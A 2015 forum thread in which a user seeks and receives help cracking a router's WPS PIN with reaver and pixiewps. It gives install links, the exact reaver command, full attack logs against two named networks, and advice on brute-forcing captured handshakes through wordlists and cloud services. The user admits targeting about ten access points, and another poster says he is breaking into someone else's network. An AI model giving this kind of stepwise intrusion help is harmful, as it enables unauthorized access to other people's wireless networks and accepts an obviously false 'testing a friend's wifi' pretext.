PixieWPS help needed

HackMania
Wed, 25 Nov 2015 @ 23:45:22

I have tried to hack a technicolor router with pixie wps.

I have followed this tutorial on YouTube: http://m.youtube.com

I get to the point where I gather the hash 1 and 2 key, and the aut.key and the pka key.

When I put it together to crack the WPS pin, it says WPS pin not found.

I assume the router is locked in some way.

Is there any other method I could use to break the WPS pin and thereafter get the WPA key?

Or maybe use the hash 1 and 2 and autkey and pka in some other software to break the wpa key?

Thank you for replying


95AE6B15
Thu, 26 Nov 2015 @ 00:10:10

Are you using all the keys provided on the same cycle?
Or are you piecing it together? They all have to be from the same cycle.
Also, Pixiewps is automated now through reaver, assuming that you have the latest version
from the pixiewps github.
It automatically collects the necessary keys, calculates the pin and retrieves the passphrase from a single command line,
assuming the AP is vulnerable.


HackMania
Thu, 26 Nov 2015 @ 00:24:32

cvsi said:

Are you using all the keys provided on the same cycle?
Or are you piecing it together? They all have to be from the same cycle.
Also, Pixiewps is automated now through reaver, assuming that you have the latest version
from the pixiewps github.
It automatically collects the necessary keys, calculates the pin and retrieves the passphrase from a single command line,
assuming the AP is vulnerable.

I don't know if it is from the same cycle or not.
I can give it a go now again if you wait a little, and make sure it all comes from the same cycle.

I am not sure how to install the latest pixiewps github, or what the command line in reaver should be.

When I start the Kali Linux live USB I type in these commands:

apt-get update
apt-get install reaver
apt-get install usbutils
apt-get install macchanger
apt-get install pixiewps

Is there anything else I should install before starting?

Could you write the command line I should use with reaver so it calculates everything automatically?

Really, thank you cvsi!! I have been trying to break it for 2 weeks now, so frustrating :(((



Hash-IT
Thu, 26 Nov 2015 @ 00:29:52

HackMania said:

I have tried to hack a technicolor router with pixie wps.

I think you meant to say... you have been asked to test the security of your friend's wifi. We don't do hacking here.


95AE6B15
Thu, 26 Nov 2015 @ 00:34:00

Install this and its prerequisites.
https://github.com/wiire/pixiewps


Install this and its requirements.
https://github.com/t6x/reaver-wps-fork-t6x
After that run this


reaver -i wlan0mon -b 00:AA:BB:11:22:33 -vvv -K 1


And plug the proper mac address in.


HackMania
Thu, 26 Nov 2015 @ 00:35:46

Hash-IT said:

HackMania said:

I have tried to hack a technicolor router with pixie wps.

I think you meant to say... you have been asked to test the security of your friend's wifi. We don't do hacking here.

Sorry :) Yes of course, I am just testing the strength of the pass. I am not so familiar with the right terms to use.


HackMania
Thu, 26 Nov 2015 @ 00:37:02

cvsi said:

Install this and its prerequisites.
https://github.com/wiire/pixiewps


Install this and its requirements.
https://github.com/t6x/reaver-wps-fork-t6x
After that run this


reaver -i wlan0mon -b 00:AA:BB:11:22:33 -vvv -K 1


And plug the proper mac address in.

Thank you so much!! I will give it a go now. Hopefully it works...


HackMania
Thu, 26 Nov 2015 @ 00:45:22

HackMania said:

cvsi said:

Install this and its prerequisites.
https://github.com/wiire/pixiewps


Install this and its requirements.
https://github.com/t6x/reaver-wps-fork-t6x
After that run this


reaver -i wlan0mon -b 00:AA:BB:11:22:33 -vvv -K 1


And plug the proper mac address in.

Thank you so much!! I will give it a go now. Hopefully it works...

Cvsi: I feel like an idiot now!!

I am not so confident with how to install the links you posted to me. Sorry, I am ashamed asking you again on how to install it, I feel like a noob. But I have never done it before, that's why I am a little unsure on how to do it.

Should I download the .zip file and extract it? Or how do I do it? Sorry for my lack of knowledge.



95AE6B15
Thu, 26 Nov 2015 @ 00:48:28

Download the zips, uncompress them and follow the installation instructions for each program.
The instructions are in the links.


HackMania
Thu, 26 Nov 2015 @ 01:45:59

cvsi said:

Download the zips, uncompress them and follow the installation instructions for each program.
The instructions are in the links.


FINALLY I made the installation. I struggled with it but I managed to install it by watching a YouTube video.

This is what I got running the command you wrote:

root@kali:~# reaver -i wlan0 -b C4:EA:1D:1D:B7:11 -vvv -K 1

Reaver v1.5.2 WiFi Protected Setup Attack Tool


[+] Waiting for beacon from C4:EA:1D:1D:B7:11
[+] Switching wlan0 to channel 1
[+] Switching wlan0 to channel 2
[+] Switching wlan0 to channel 3
[+] Switching wlan0 to channel 4
[+] Switching wlan0 to channel 5
[+] Switching wlan0 to channel 6
[+] Switching wlan0 to channel 7
[+] Switching wlan0 to channel 8
[+] Switching wlan0 to channel 9
[+] Switching wlan0 to channel 11
[+] Associated with C4:EA:1D:1D:B7:11 (ESSID: TN_24GHz_1DB711)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 3a:07:10:66:cf:7a:ba:80:08:46:3e:44:a9:9b:2e:bd
[P] PKE: ac:a2:35:0d:81:3f:bd:d6:6f:d0:47:98:dd:24:a7:24:1c:66:5d:b8:a3:01:d8:cf:41:a9:bb:e5:05:b7:41:23:4f:50:90:bb:21:e8:19:2a:98:b0:b5:8e:6f:c6:af:0a:ec:17:07:10:81:9d:56:14:9e:0d:61:7e:06:fb:99:43:34:60:d6:06:29:eb:27:46:4e:05:74:09:fa:62:26:6f:88:22:b9:cb:1f:aa:23:bb:7b:af:42:bb:67:ee:7e:ca:68:e8:6e:22:e3:bc:7e:4d:69:9f:13:76:3d:3b:18:79:dc:c4:a4:31:bc:c9:00:45:7f:1e:73:ac:eb:cd:5f:02:f3:d2:70:30:6c:2c:28:c4:ff:e8:20:61:53:7a:a3:ed:7a:a4:02:a9:05:83:e3:ad:bf:9a:cc:ca:e0:bd:20:73:f8:61:32:5a:37:49:95:d0:9b:4c:a6:2c:80:3e:8d:f7:a4:b2:41:5b:0f:3c:39:fa:7f:13:a4:c5:47:b7:c1:e7
[P] WPS Manufacturer: Technicolor
[P] WPS Model Name: Technicolor TG
[P] WPS Model Number: 789vac
[P] Access Point Serial Number: 1526SAAKH
[+] Received M1 message
[P] R-Nonce: eb:64:88:b0:50:1a:db:2f:d3:c3:11:76:97:54:9b:10
[P] PKR: fc:50:2a:15:4a:71:54:c9:8e:f3:1d:a4:c5:9c:f3:71:c3:47:b4:a0:c4:b4:34:c0:df:1e:13:85:fc:86:51:35:66:25:94:25:4b:69:70:83:c6:d4:fb:70:0d:2f:82:ee:a0:b5:5f:c6:e3:3b:21:58:1e:1d:97:d3:94:6a:fd:f3:10:23:b8:8b:05:bf:fc:f4:78:68:0e:59:2b:17:1b:35:6e:a8:73:05:ef:72:51:72:7d:f2:23:3f:71:6e:41:12:63:2a:58:d9:ce:94:cb:ab:a9:1f:a9:34:dd:2e:18:57:e7:34:7d:79:21:4b:a0:58:10:81:7c:82:f3:81:e7:c0:45:c8:52:2d:d0:a7:81:e8:c8:bb:ec:76:12:73:ee:3f:13:4a:3a:74:57:92:cb:76:f4:57:84:08:7d:44:12:b0:93:9c:ea:28:99:13:77:1d:5b:47:a5:d0:6e:7e:4d:60:9f:12:10:1a:16:57:65:b2:db:ce:52:61:30:6f:41:a7
[P] AuthKey: 5c:5b:92:30:bf:51:e7:08:14:f8:66:43:26:19:63:23:b2:8d:14:60:be:67:21:4f:8b:50:4b:93:17:d4:0c:fc
[+] Sending M2 message
[P] E-Hash1: 34:27:53:91:6d:c2:4d:42:43:bc:b3:de:1e:a0:9d:9c:d7:2e:9c:e3:1f:71:41:28:72:67:79:09:95:75:1a:92
[P] E-Hash2: 3d:49:3b:13:a5:bb:71:f6:38:fe:9c:11:9c:43:5a:c8:c6:e4:df:d8:67:4b:fb:14:12:df:a7:71:3d:4f:6f:77
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 0 s 270 ms
[Pixie-Dust]
[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]


Any ideas what to do now? It seems that it is not able to get the WPS pin.


95AE6B15
Thu, 26 Nov 2015 @ 01:57:21

It just may not be vulnerable to that attack.
You may have to just do good old bruteforce and crack the cap file.


HackMania
Thu, 26 Nov 2015 @ 02:03:13

cvsi said:

It just may not be vulnerable to that attack.
You may have to just do good old bruteforce and crack the cap file.

Is there no other way left now than to bruteforce it? If there is I will try it also. If I bruteforce with my laptop it will take ages to crack it, I think.


95AE6B15
Thu, 26 Nov 2015 @ 02:26:33

It's possible there are other ways. I just don't know them.


HackMania
Thu, 26 Nov 2015 @ 02:34:07

cvsi said:

It's possible there are other ways. I just don't know them.

Ok. I understand, I am really glad that you helped me. I will try to upload the .cap file in aircloud-ng. Maybe they can crack it over there. But I'm sceptical.

Btw. I ran fork on many different APs. Maybe 10. I only managed to get the pin from 1 of them. Some had AP rate limiter. And some had fault code (02x0).



WPA2
Thu, 26 Nov 2015 @ 12:43:31

What's the output of

wash -i wlan0mon



HackMania
Thu, 26 Nov 2015 @ 12:53:17

WPA2 said:

What's the output of

wash -i wlan0mon


The output is WPS LOCKED: YES.

Is it impossible to crack it if WPS locked is set to yes?


HackMania
Thu, 26 Nov 2015 @ 13:35:59

But when I am trying to crack a WPS locked NO it looks like this:

    root@kali:~# reaver -i wlan0 -b 28:C6:8E:71:8E:AF -vvv -K 1

    Reaver v1.5.2 WiFi Protected Setup Attack Tool


    [+] Waiting for beacon from 28:C6:8E:71:8E:AF
    [+] Switching wlan0 to channel 1
    [+] Switching wlan0 to channel 2
    [+] Switching wlan0 to channel 3
    [+] Switching wlan0 to channel 4
    [+] Switching wlan0 to channel 6
    [+] Associated with 28:C6:8E:71:8E:AF (ESSID: ComHem718EAB)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Switching wlan0 to channel 5
    [+] Switching wlan0 to channel 6
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response


HackMania
Thu, 26 Nov 2015 @ 22:25:02

I have tried to crack the file with https://aircloud-ng.me/ with their free service, I only pay if the password is recovered.


The engine failed retrieving the password. But they have wordlists also. Is there any wordlist that would maybe find the password??
I have read that Technicolor maybe have 10 hex uppercase. But I am really not sure. So I don't know what to choose to crack it??

Or can you guide me somewhere where I can get it cracked??

Please help me. I am so frustrated with this!!


soxrok2212
Fri, 27 Nov 2015 @ 21:12:58

If it is 10 hex, then yes it is possible to be cracked and NO you don't need to pretend you are not breaking into someone else's network.



WPA2
Sat, 28 Nov 2015 @ 09:09:14

HackMania said:

WPA2 said:

What's the output of

wash -i wlan0mon


The output is WPS LOCKED: YES.

Is it impossible to crack it if WPS locked is set to yes?

That is just a LQ answer to my question, and clearly shows you have no clue what you are doing. Of course it CANNOT be cracked when WPS is locked.

